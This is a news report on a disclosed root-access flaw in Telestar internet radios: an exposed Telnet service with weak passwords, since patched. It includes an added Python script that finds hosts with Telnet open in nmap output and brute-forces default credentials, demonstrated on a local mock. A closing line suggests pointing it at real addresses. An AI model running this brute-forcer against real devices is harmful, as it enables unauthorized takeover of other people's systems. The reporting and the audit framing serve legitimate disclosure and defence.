Critical vulnerabilities have been discovered in Telestar Digital GmbH Internet of Things (IoT) radio devices that permit attackers to remotely hijack systems.
Several weeks ago, researchers at Vulnerability-Lab found an anomaly on a private server linked to the web radio terminals of Telestar devices, alongside an undocumented telnetd server running on the radios themselves.
The radios in question are from the company's Imperial & Dabman Series I and D product line, which include portable radios and DAB stereos.
These products are sold across Europe, offer Bluetooth and Internet connectivity, and run a BusyBox-based Linux (Debian).
An investigation into the radios revealed an undocumented Telnet service on port 23. Because port forwarding was active on the devices, the service could be reached from outside the local network. In their demonstration video, the researchers use an nmap port scan to locate the service and ncrack to brute-force the login.
Because the credentials were weak, the team was able to connect and brute-force the login within 10 minutes, obtaining root access with full privileges.
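The two steps described above (find hosts exposing Telnet, then try a short list of default credentials against them) are what a scanner plus ncrack does. The script below is an added example written for this page, not the researchers' tooling or the vendor's code. It parses constructed nmap grepable output, then runs a credential check against a mock Telnet login dialog served on localhost; the mock skips Telnet option negotiation, and the credential list and the "root"/"admin" pair the mock accepts are assumptions for illustration, not the radios' real settings.

```python
"""Added example: locate exposed Telnet in nmap -oG output and test default
credentials against a constructed mock Telnet service on localhost."""
import asyncio
import re

# Constructed sample of `nmap -p 23,80 -oG -` output (not from a real scan).
SAMPLE_NMAP_GREPABLE = """\
# Nmap 7.80 scan initiated
Host: 192.168.1.50 ()\tPorts: 23/open/tcp//telnet///, 80/open/tcp//http///\tIgnored State: closed (998)
Host: 192.168.1.51 ()\tPorts: 80/open/tcp//http///\tIgnored State: closed (999)
Host: 192.168.1.52 ()\tPorts: 23/filtered/tcp//telnet///\tIgnored State: closed (999)
# Nmap done
"""

# Small default-credential list of the kind brute-forcers ship (assumed values).
DEFAULT_CREDS = [("root", "root"), ("admin", "admin"), ("root", "admin"), ("root", "1234")]

# The weak pair the mock device accepts (an assumption, not the real firmware's).
ACCEPTED = ("root", "admin")


def hosts_with_open_port(grepable, port=23):
    """Return IPs whose nmap -oG 'Host:' line lists `port` in state 'open'.

    Each Ports entry has the form port/state/protocol/owner/service/rpc/version/.
    """
    found = []
    for line in grepable.splitlines():
        m = re.match(r"Host: (\S+) .*?\tPorts: (.*?)(?:\t|$)", line)
        if not m:
            continue
        ip, ports = m.groups()
        for entry in ports.split(", "):
            fields = entry.split("/")
            if fields[0] == str(port) and fields[1] == "open":
                found.append(ip)
    return found


async def mock_telnet(reader, writer):
    """Constructed stand-in for a telnetd login dialog (no IAC negotiation)."""
    writer.write(b"radio login: ")
    user = (await reader.readline()).strip().decode(errors="replace")
    writer.write(b"Password: ")
    pw = (await reader.readline()).strip().decode(errors="replace")
    if (user, pw) == ACCEPTED:
        writer.write(b"\r\n# ")  # root shell prompt
    else:
        writer.write(b"\r\nLogin incorrect\r\n")
    await writer.drain()
    writer.close()


async def try_login(host, port, user, pw, timeout=2.0):
    """Open one connection, answer the login/password prompts, report success."""
    reader, writer = await asyncio.open_connection(host, port)
    try:
        await asyncio.wait_for(reader.readuntil(b"login: "), timeout)
        writer.write(user.encode() + b"\r\n")
        await asyncio.wait_for(reader.readuntil(b"Password: "), timeout)
        writer.write(pw.encode() + b"\r\n")
        await writer.drain()
        reply = await asyncio.wait_for(reader.read(), timeout)  # read to EOF
        return b"# " in reply and b"incorrect" not in reply
    finally:
        writer.close()


async def brute_force(host, port, creds):
    """Try each credential pair in turn; return the first that yields a shell."""
    for user, pw in creds:
        if await try_login(host, port, user, pw):
            return (user, pw)
    return None


async def _demo():
    server = await asyncio.start_server(mock_telnet, "127.0.0.1", 0)
    port = server.sockets[0].getsockname()[1]
    try:
        exposed = hosts_with_open_port(SAMPLE_NMAP_GREPABLE)
        # Attack the local mock rather than the address from the sample scan.
        hit = await brute_force("127.0.0.1", port, DEFAULT_CREDS)
        return exposed, hit
    finally:
        server.close()
        await server.wait_closed()


def run_demo():
    """Return (hosts exposing Telnet, working credential pair or None)."""
    return asyncio.run(_demo())


if __name__ == "__main__":
    exposed_hosts, working = run_demo()
    print("Telnet exposed on:", exposed_hosts)
    print("Working credentials:", working)
```

Against a real fleet you would point `brute_force` at the addresses `hosts_with_open_port` returns from your own scan, and the same check doubles as a defender's audit: any device that answers a default pair here is one a Mirai-style scanner would also find.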
"For testing we edited some of the folders, created files, and modified paths to see what we are able to change in the native source of the application," Kunz says. "Finally, we were able to edit and access everything on the box and had the ability to fully compromise the smart web radio device."
Possible attacks included changing device names, forcing a play stream, saving audio files as messages, and transmitting audio as commands both locally and remotely.
On Facebook, the security researcher said over one million devices may be at risk.
While the compromise of a single IoT radio may not seem like a big security issue, the disclosure highlights a problem that affects all of us: the conscription of exposed IoT devices into larger threats. As an example, Mirai botnet variants specialize in hijacking IoT devices with open ports or weak security, such as default credentials, in order to launch powerful distributed denial-of-service (DDoS) attacks.
It is also possible to harness these vulnerabilities to spread malware or to deface devices.
Vulnerability-Lab notified Telestar Digital GmbH of its research on June 1. Within a week, the vendor responded to the report and a patch was ready by August 30, leading to the coordinated public disclosure.
The telnetd service is being changed and the weak password policy has been revised. Updates over Wi-Fi are now available: affected devices must be reset to factory settings, after which they download the latest firmware version.
Telestar Digital GmbH is not aware of any examples of the vulnerabilities being exploited in the wild.